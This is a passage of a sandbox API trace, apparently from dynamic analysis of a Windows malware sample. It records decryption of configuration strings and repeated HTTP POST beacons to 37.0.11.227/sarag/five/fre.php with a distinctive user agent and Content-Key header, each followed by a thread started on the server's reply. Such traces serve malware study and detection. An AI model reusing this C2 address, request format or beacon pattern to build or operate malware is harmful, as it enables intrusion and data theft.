Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0296.190] GetProcessHeap () returned 0x690000 [0296.190] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0296.190] GetProcessHeap () returned 0x690000 [0296.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0296.191] send (s=0x998, buf=0x6ad508*, len=242, flags=0) returned 242 [0296.191] send (s=0x998, buf=0x6aba40*, len=159, flags=0) returned 159 [0296.191] GetProcessHeap () returned 0x690000 [0296.191] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0296.191] recv (in: s=0x998, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0296.267] GetProcessHeap () returned 0x690000 [0296.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0296.268] GetProcessHeap () returned 0x690000 [0296.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0296.268] GetProcessHeap () returned 0x690000 [0296.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0296.268] GetProcessHeap () returned 0x690000 [0296.269] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0296.269] closesocket (s=0x998) returned 0 [0296.269] GetProcessHeap () returned 0x690000 [0296.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0296.270] GetProcessHeap () returned 0x690000 [0296.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0296.270] GetProcessHeap () returned 0x690000 [0296.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0296.270] GetProcessHeap () returned 0x690000 [0296.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0296.273] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1304) returned 0x998 [0296.274] Sleep (dwMilliseconds=0xea60) [0296.275] GetProcessHeap () returned 0x690000 [0296.275] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0296.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.276] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.286] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0296.292] GetProcessHeap () returned 0x690000 [0296.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0296.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.293] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0296.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.294] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.295] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.295] GetProcessHeap () returned 0x690000 [0296.296] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0296.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.297] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0296.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.298] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0296.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.299] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0296.299] GetProcessHeap () returned 0x690000 [0296.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0296.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.301] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0296.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.302] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0296.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.306] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0296.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.310] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0296.310] GetProcessHeap () returned 0x690000 [0296.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0296.310] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0296.310] GetProcessHeap () returned 0x690000 [0296.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0296.310] GetProcessHeap () returned 0x690000 [0296.311] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0296.311] GetProcessHeap () returned 0x690000 [0296.311] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0296.311] GetProcessHeap () returned 0x690000 [0296.311] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0296.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.312] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.331] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0296.341] GetProcessHeap () returned 0x690000 [0296.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0296.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.342] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0296.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.343] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.344] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.344] GetProcessHeap () returned 0x690000 [0296.344] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0296.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.345] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0296.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.346] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0296.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.347] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0296.347] GetProcessHeap () returned 0x690000 [0296.348] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0296.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.351] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0296.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.352] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0296.353] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.353] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0296.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.354] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0296.354] GetProcessHeap () returned 0x690000 [0296.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0296.354] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0296.354] GetProcessHeap () returned 0x690000 [0296.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0296.354] socket (af=2, type=1, protocol=6) returned 0x99c [0296.355] connect (s=0x99c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0296.383] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0296.383] GetProcessHeap () returned 0x690000 [0296.383] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0296.383] GetProcessHeap () returned 0x690000 [0296.383] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0296.383] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0296.384] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0296.384] GetProcessHeap () returned 0x690000 [0296.384] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0296.384] GetProcessHeap () returned 0x690000 [0296.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0296.385] GetProcessHeap () returned 0x690000 [0296.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0296.385] GetProcessHeap () returned 0x690000 [0296.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0296.386] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0296.387] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0296.387] GetProcessHeap () returned 0x690000 [0296.387] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0296.387] GetProcessHeap () returned 0x690000 [0296.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0296.387] send (s=0x99c, buf=0x6ad508*, len=242, flags=0) returned 242 [0296.388] send (s=0x99c, buf=0x6aba40*, len=159, flags=0) returned 159 [0296.388] GetProcessHeap () returned 0x690000 [0296.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0296.388] recv (in: s=0x99c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0296.463] GetProcessHeap () returned 0x690000 [0296.463] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0296.464] GetProcessHeap () returned 0x690000 [0296.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0296.464] GetProcessHeap () returned 0x690000 [0296.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0296.464] GetProcessHeap () returned 0x690000 [0296.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0296.465] closesocket (s=0x99c) returned 0 [0296.465] GetProcessHeap () returned 0x690000 [0296.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0296.465] GetProcessHeap () returned 0x690000 [0296.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0296.465] GetProcessHeap () returned 0x690000 [0296.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0296.466] GetProcessHeap () returned 0x690000 [0296.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0296.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1314) returned 0x99c [0296.476] Sleep (dwMilliseconds=0xea60) [0296.478] GetProcessHeap () returned 0x690000 [0296.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0296.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.479] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.486] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0296.495] GetProcessHeap () returned 0x690000 [0296.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0296.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.496] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0296.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.497] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.498] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.498] GetProcessHeap () returned 0x690000 [0296.498] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0296.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.499] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0296.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.500] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0296.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.501] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0296.501] GetProcessHeap () returned 0x690000 [0296.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0296.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.505] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0296.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.506] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0296.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.507] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0296.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.508] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0296.508] GetProcessHeap () returned 0x690000 [0296.508] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0296.508] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0296.508] GetProcessHeap () returned 0x690000 [0296.508] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0296.508] GetProcessHeap () returned 0x690000 [0296.509] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0296.509] GetProcessHeap () returned 0x690000 [0296.509] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0296.509] GetProcessHeap () returned 0x690000 [0296.509] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0296.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.511] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.523] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0296.530] GetProcessHeap () returned 0x690000 [0296.530] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0296.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.531] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0296.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.532] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.533] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.533] GetProcessHeap () returned 0x690000 [0296.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0296.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.535] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0296.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.535] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0296.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.538] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0296.538] GetProcessHeap () returned 0x690000 [0296.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0296.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.540] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0296.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.541] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0296.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.542] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0296.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.542] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0296.542] GetProcessHeap () returned 0x690000 [0296.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0296.543] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0296.543] GetProcessHeap () returned 0x690000 [0296.543] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0296.543] socket (af=2, type=1, protocol=6) returned 0x9a0 [0296.543] connect (s=0x9a0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0296.575] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0296.575] GetProcessHeap () returned 0x690000 [0296.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0296.576] GetProcessHeap () returned 0x690000 [0296.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0296.576] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0296.577] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0296.577] GetProcessHeap () returned 0x690000 [0296.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0296.577] GetProcessHeap () returned 0x690000 [0296.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0296.578] GetProcessHeap () returned 0x690000 [0296.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0296.578] GetProcessHeap () returned 0x690000 [0296.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0296.579] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0296.580] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0296.580] GetProcessHeap () returned 0x690000 [0296.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0296.580] GetProcessHeap () returned 0x690000 [0296.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0296.580] send (s=0x9a0, buf=0x6ad508*, len=242, flags=0) returned 242 [0296.583] send (s=0x9a0, buf=0x6aba40*, len=159, flags=0) returned 159 [0296.583] GetProcessHeap () returned 0x690000 [0296.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0296.583] recv (in: s=0x9a0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0296.657] GetProcessHeap () returned 0x690000 [0296.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0296.658] GetProcessHeap () returned 0x690000 [0296.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0296.658] GetProcessHeap () returned 0x690000 [0296.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, 